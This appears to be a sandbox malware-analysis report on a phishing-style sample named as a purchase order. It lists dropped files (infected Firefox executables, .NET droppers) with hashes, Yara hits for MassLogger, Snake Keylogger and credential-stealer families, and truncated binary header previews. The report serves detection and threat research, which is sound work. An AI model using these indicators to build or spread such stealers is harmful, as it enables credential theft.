SHA-512:	EA4AE69317D6EFF6285F3CD6D602E6B34B4204344B34152967348C93E909AD76D781DD8783BF962AF0F8A100950C52D2F190B53A8C14A5FCA5C319B0A96CD859
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."..........B.................@.................................... ..... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).........................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.....................@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

C:\Program Files\Mozilla Firefox\crashreporter.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1378304
Entropy (8bit):	5.377428517783645
Encrypted:	false
SSDEEP:	12288:tQUVPDHhSGXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:WyhSGsqjnhMgeiCl7G0nehbGZpbD
MD5:	9E72BFABD8DEA8A3EF4E4BAD248290CF
SHA1:	6DA98999FCA9994CA4EEB573876F1153227BF2A0
SHA-256:	2AF419D459279BCBAF8A891605ECD1E522C574DD01F3ECE1061B455DCF7FF0B3
SHA-512:	10FE11EB401837234D4D1C483941DB62B452B77D0084D9FA70C49B31FDC2EB396CF882B3CA45F851D9FD4DF07502F091622BD57C2BB8E4C38EFAFFF5FBA6CB63
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p......l..... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\default-browser-agent.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1286656
Entropy (8bit):	7.222111230196331
Encrypted:	false
SSDEEP:	24576:EsFfc1VyFn5UQn652bO4HFsqjnhMgeiCl7G0nehbGZpbD:EsFcIn5rJ/Dmg27RnWGj
MD5:	373172D896DE6F41FFBE2672F9E40A4C
SHA1:	2E70D68A54D6E896D31CAFE01697E65357C1A046
SHA-256:	FDD592F0BF7A6CC79C6E75A3CE8A3460DDA62953836EA289925F1BE8A18ECE9A
SHA-512:	72AE16A993C6BE82F624CDCA5374834D132639DCC086586B504E0124B85EFF793127DCE629F3366C3386E1344164C99BD32E1110215A7E690D0D9538F9ED90A1
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@.......................................... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\firefox.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1246208
Entropy (8bit):	7.494267101397232
Encrypted:	false
SSDEEP:	24576:Yt9o6p4xQbiKI69wpemIwpel96sqjnhMgeiCl7G0nehbGZpbD:Yt9faQbtl2peapelkDmg27RnWGj
MD5:	65F1DC248E5BC99D02DADF3E02C4161C
SHA1:	4D43DB84A1AF800E852FC4B081DBA71CE2E59869
SHA-256:	B386A5C7822E75E32D400EFB16E14CD70657DEFBDB04F3DFB1FC72CC12751E97
SHA-512:	CACC084FB919110B19958E22E9E4ADAD64D986030750591E1DA692FB0F660ABBF013514AB49DD62E14A4B62F3747D3290D1C32B940AB5574A83B40DEDD38B94F
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@.......................................... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\maintenanceservice.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1356800
Entropy (8bit):	5.347828379839608
Encrypted:	false
SSDEEP:	24576:7QVTZu0JtsqjnhMgeiCl7G0nehbGZpbD:MVTZu0Dmg27RnWGj
MD5:	08206B3FFD609A760CC2937EEAE299EF
SHA1:	E8DF29675912E1A1DCD5C91E9D7D2E48D1AFB7B1
SHA-256:	918AB477BEDB26B49C2FC3662C3C8285128DAE03F3982323E6F3332F493DB2BB
SHA-512:	02147328069DEAD4E3EF55E0AF05DB29DE5434051D4F6FA10CB37A50DD7A34C30228BD50DAF2E4E01B95D5C75833D9341D499696A716B8B2F10759C96DDBB621
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P............ .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1344000
Entropy (8bit):	6.808376383606787
Encrypted:	false
SSDEEP:	24576:ZC1vpgXcZHzbsqjnhMgeiCl7G0nehbGZpbD:ZC1vpIcNPDmg27RnWGj
MD5:	D0417A882B9FBB0D90CF46AF2B128BF5
SHA1:	F3E0E6F7F3B9D2500E7E7B28576A5DD192BEEDDD
SHA-256:	386C59E31A735BFD78A04758B7672F512CFFA38714A71746B78B20DC8A0FD4F3
SHA-512:	57DB99EFA1513B01843AA2D7E30A3FFC02A26504100745C3643F8129152089B945B9219B78E0219E76697FCA2CB92C8DAB0B91CFA5DDFC533C01A7CC5070A543
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@......................................... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\pingsender.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1200128
Entropy (8bit):	5.1400227499322115
Encrypted:	false
SSDEEP:	12288:0SwjPXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:0vPsqjnhMgeiCl7G0nehbGZpbD
MD5:	C85776315E14F26D432516F8C891489C
SHA1:	DC4128E18F8E46EA34F057936F0087B938D905F0
SHA-256:	6C9A8D6713B508187718596B073F919DE0836C3DDEA9EABD42E01862EB80E07F
SHA-512:	8607B69F25DD3C0676CF71B7D246E014BB662BE21812A4BBADD76DB10C9F919A0EDCCF9D10DE35077C4D479EF8863E9F81C1A64E6EF8C9AF356DAAF7C0EE94A8
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@.......................................... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\plugin-container.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1408512
Entropy (8bit):	5.4411487011559165
Encrypted:	false
SSDEEP:	24576:BWKntIfGpdsqjnhMgeiCl7G0nehbGZpbD:Y8Ie3Dmg27RnWGj
MD5:	49EDE90C03C06BD793D532E6598F51EE
SHA1:	09BB794EED1E7A58B8DC389988A9F8DE61640592
SHA-256:	953128D6326D68B9FF702495C905D1C115B98ECE6A32CB74909A19E2BFF9F112
SHA-512:	2AEA9E678213C0334EBCADD99CCD385DEF7912E109DF17982608201EA46EDD25217D607E5658EA15C12F4B5D610AC71085A06154C03FAED5F3C9365AB6303298
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@.......................................... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\private_browsing.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1185280
Entropy (8bit):	5.10328214822101
Encrypted:	false
SSDEEP:	12288:BIhTXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:8TsqjnhMgeiCl7G0nehbGZpbD
MD5:	0DD6F15FCC57CB9E9314300C348E1170
SHA1:	1A2BA22738A4FF7AC48F71D82285B59AA2A97B2E
SHA-256:	188A671DBAD55C9082EF35752595C64F076933BA9385EC2CD4D0B86684999C96
SHA-512:	50706B28BE42F686843455A7CBD33824C53A6E41E8263F2880E5E144B5CDB7263763EF7ECAC0ECE9068FB19C00823A2BCF8EE4B9D86058900A8FA5120BFCA52F
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@....................................t..... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\updater.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1531904
Entropy (8bit):	5.42119774776156
Encrypted:	false
SSDEEP:	24576:t8oREwt2ioQ3J+RqsqjnhMgeiCl7G0nehbGZpbD:t8oRpoF+Dmg27RnWGj
MD5:	A3BC1AB65318EF80451FBB21D6D8FD90
SHA1:	6EA522224502440319A26149FE8523B933A5DAE4
SHA-256:	E1318853E8D5F86AD57353ED722EDB67A80F8DA760F028E69FB83C66450095AA
SHA-512:	1A110A68D6326DE5B523354E5E9FB3422BC98D7429EFAB21430DB28B318FC8F843788F69B0A6764E612CD624011E7B80059CB1EEF753DEB683E19FA53AE39388
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@.......................................... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_2024_056209_MQ04865_ENQ_1045.exe.log

Download File

Process:	C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zeXKjViL.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\zeXKjViL.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380192968514367
Encrypted:	false
SSDEEP:	48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZmUyus:+LHyIFKL3IZ2KRH9Ouggs
MD5:	B884D46C735FA019EEE79EC313FFA707
SHA1:	CAE46541C4C8A3EA3FBA10A48F27C3D81950FEF4
SHA-256:	4A8C67C5F11EDE57F90714010B41E89F8EE8D1D3CE9907018FC9A7081E5C840A
SHA-512:	258C2F01FDF256E0A4D4A726F30F33FB2D1A2AC7854E64CBBCA1941168BD658E50CA7CA8976EA22722B1E4CF8F0A93B0E12162DF90559C3093D4604291231358
Malicious:	true
Reputation:	unknown
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\Microsofts.exe

Download File

Process:	C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	98816
Entropy (8bit):	5.666546286050177
Encrypted:	false
SSDEEP:	1536:qwa4JaIFveZKGAmwJVeDhp0dqnjErVf4UMR7pspNYZd:24Jj4ZKGHwJVeDDKqnj6bMDspNC
MD5:	F6B8018A27BCDBAA35778849B586D31B
SHA1:	81BDE9535B07E103F89F6AEABDB873D7E35816C2
SHA-256:	DDC6B2BD4382D1AE45BEE8F3C4BB19BD20933A55BDF5C2E76C8D6C46BC1516CE
SHA-512:	AA958D22952D27BAD1C0D3C9D08DDBF364274363D5359791B7B06A5D5D91A21F57E9C9E1079F3F95D7CE5828DCD3E79914FF2BD836F347B5734151D668D935DE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nH...............P..x............... ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...................Z....................................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....(....&..( .....s!........s"........s#........s$........s%........Z........o8...........&..(9....&........".......Vs....(B...t...........(C..."~....+."~....+."~....+."~....+."~....+.b.r...p.oa...(....(@....:.~.....o....&.:.(P....(Q......~3...,.~3...+.~1.....x...s....%.3...(.....*..(Y....(L...

C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

Download File

Process:	C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	4.910353963160109
Encrypted:	false
SSDEEP:	1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
MD5:	E91A1DB64F5262A633465A0AAFF7A0B0
SHA1:	396E954077D21E94B7C20F7AFA22A76C0ED522D0
SHA-256:	F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
SHA-512:	227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5w01d5uy.1rp.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	true
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cllezk0v.dtg.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gh1bt3rc.i3w.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	true
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_he4vwakp.5ku.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	true
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rt3aeghl.bwp.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqn4fnej.yaq.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tv43awin.xsd.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	true
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wchwsqu1.pcz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	true
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xbjhbjfb.ggs.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
